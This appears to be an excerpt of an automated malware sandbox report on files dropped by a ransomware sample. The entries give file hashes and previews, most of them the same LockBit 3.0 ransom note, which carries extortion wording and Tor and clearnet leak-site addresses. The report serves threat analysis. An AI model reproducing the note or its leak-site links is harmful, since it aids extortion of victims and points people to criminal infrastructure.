
                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.977210121057951
                Encrypted:false
                SSDEEP:192:ZTXTUWyPjGFlsPDmqnEqDZT7PXtdlEh9BY7c2bR1FPivo:Z7TKjuGPDtnJDZTTDGhfY9jF3
                MD5:981118CE128AE1BACCD729FFD914772B
                SHA1:A25C31FFFA1B8E912EBAFDE31B29521567DDE909
                SHA-256:9822802000D5C184B201586D39EED1F117F3B16DAB42528C89A0CB91FBDC6151
                SHA-512:B6A18E22543A7963B2D68A890A7682B85BE8DE54D519DCDAFCBCBD8F395FF6843C05F99B0B2E579F146388B26F9A91A0C00896CA765DF3EF721C5A6C925F1A2B
                Malicious:false
                Preview:..."...+..!EJ.I..H^../kD5.j5...|...6k...j"...J...Wcd.m*..C(.nA.8...p.......Ge..7'B..}m..f..iF..L....H..xZ..D......#.9^.>?l...~.\..+...n?.i!T..T.5.........O.%.........?~..J.aK.y.&S.T...+Zk...6.8{.h.d}.a}.....]...wc.x.L$.Y;....?..xg.>........VC.h....{.....b..z....1@...Mw..A...{7.m...{j...3...v.D....8}J..q.h.i..I.3*:......R..-.h.W..Q...0..e.I,..^...%..%.....an...cU}@....XoA.I.3=*.?@....-........4......Z.v.._....?..[....CZ...~..k..4i...E.$[..Y.t.A..*..G`.g.qW..8...F..N....N/...j.....s..Y!....U?.}.s.A.>...v......=...Eu.G..].V..u.^x|..V.m...F..>.@..J]..:../..u.......D;$..EI....t..6.9.0yU`....C....."v.v..Z.....x..hJ!.\.3....!......[.....4.<..o.A{)..p...s.P....b%..t.....}...V........x....b..Dl.....0;..?\...c.xep.7t$}.Y..{..qB*..S.li..../..W...:...Q....$]...M...:4P..O..2.M.f..>&.!".E\/Q.S!EztP%m..u..."N.%.b=...............l.s.t.....x.Y.Z..3G+.Zc.t1..0n....3z.jj,6.^..P;.a.....).)~....,.......aF.x1...v%...1...}...I2V.....I.$..F.N,...X9..J...Lk..}.oq

                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor 